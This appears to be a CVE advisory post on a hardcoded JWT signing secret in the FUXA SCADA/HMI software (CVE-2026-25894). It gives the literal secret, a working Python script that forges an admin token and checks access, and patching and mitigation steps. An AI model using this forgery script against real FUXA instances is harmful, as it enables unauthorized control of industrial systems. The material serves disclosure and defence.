FUXA, Hardcoded JWT Secret, CVE-2026-25894 (Critical)

Listen to this Post

FUXA versions prior to 1.2.10 contained a critical insecure default vulnerability where a static fallback JWT signing secret (frangoteam751) was hardcoded in the application source . This secret was used to sign and verify JSON Web Tokens when authentication was enabled (secureEnabled: true) but the administrator did not explicitly set a custom `secretCode` in the configuration . The issue stems from CWE-321 (Use of Hard-coded Cryptographic Key), creating a fail-open security posture where the system appears to be in secure mode while still accepting tokens signed with a publicly known key . An unauthenticated, remote attacker aware of this default value can forge valid JWT tokens with administrative privileges (groups: -1) . With these forged tokens, the attacker can bypass all authentication mechanisms and interact with administrative APIs, including the `/api/runscript` endpoint, leading to remote code execution in the context of the FUXA service . Successful exploitation can result in full system compromise and potentially expose connected ICS/SCADA environments to further attacks . The issue was patched in version 1.2.10 by removing the static fallback and ensuring a secure random secret is generated when no `secretCode` is provided .
Platform: FUXA
Version: <= 1.2.9
Vulnerability : Hardcoded JWT Secret
Severity: Critical
date: Mar 6, 2026

Prediction: Patch released v1.2.10

What Undercode Say:

Analytics:

The vulnerability is officially identified as CVE-2026-25894 with a CVSS v3.1 score of 9.8 (Critical) . It affects all versions of FUXA up to and including 1.2.9 . The issue is rooted in CWE-321 (Use of Hard-coded Cryptographic Key) . According to the GitHub Advisory, the severity is rated as CRITICAL with a CVSS v4 score of 9.5 . The vulnerability was published on February 5, 2026 and patched in version 1.2.10 .

How Exploit:

Below is a Python script snippet that forges an admin token using the hardcoded secret and verifies access by querying the `/api/users` endpoint .

import requests
import jwt
import datetime
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
HARDCODED_SECRET = 'frangoteam751' The fallback secret
def forge_admin_token():
"""Forge an admin token using the hardcoded secret."""
payload = {
"id": "exploit_admin",
"groups": -1, Admin group
"exp": datetime.datetime.utcnow() + datetime.timedelta(hours=1)
}
token = jwt.encode(payload, HARDCODED_SECRET, algorithm="HS256")
if isinstance(token, bytes):
token = token.decode('utf-8')
return token
def exploit(target_url):
token = forge_admin_token()
headers = {"x-access-token": token}
Verify token works by accessing users endpoint
r = requests.get(f"{target_url}/api/users", headers=headers, verify=False)
if r.status_code == 200:
print("[+] Token forgery successful! Admin access granted.")
print("[+] Now you can execute code via /api/runscript")
else:
print("[-] Exploit failed. Target may be patched.")
Example: exploit("https://target-fuxa-instance:1882")

Protection from this CVE:

  1. Immediate Update: Upgrade to FUXA version 1.2.10 or later, which removes the hardcoded fallback secret .
  2. Set Custom Secret: If you cannot update immediately, explicitly set a strong, unique `secretCode` in the `server/_appdata/settings.js` configuration file . Example:
    module.exports = {
    secureEnabled: true,
    secretCode: 'your-strong-random-secret-here', // Replace with a complex secret
    tokenExpiresIn: '1h'
    };
    
  3. Network Segmentation: Restrict network access to the FUXA web interface, allowing only trusted IP addresses or networks to connect.
  4. Monitor Logs: Check access logs for unauthorized API calls, especially to administrative endpoints like `/api/users` and /api/runscript.

Impact:

Successful exploitation allows an unauthenticated, remote attacker to gain full administrative access to the FUXA server. The attacker can then execute arbitrary code on the system, potentially leading to full server compromise . Because FUXA is used as a SCADA/HMI dashboard, this can provide a foothold into industrial control system (ICS) environments, allowing attackers to manipulate or disrupt physical processes monitored by the software .

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top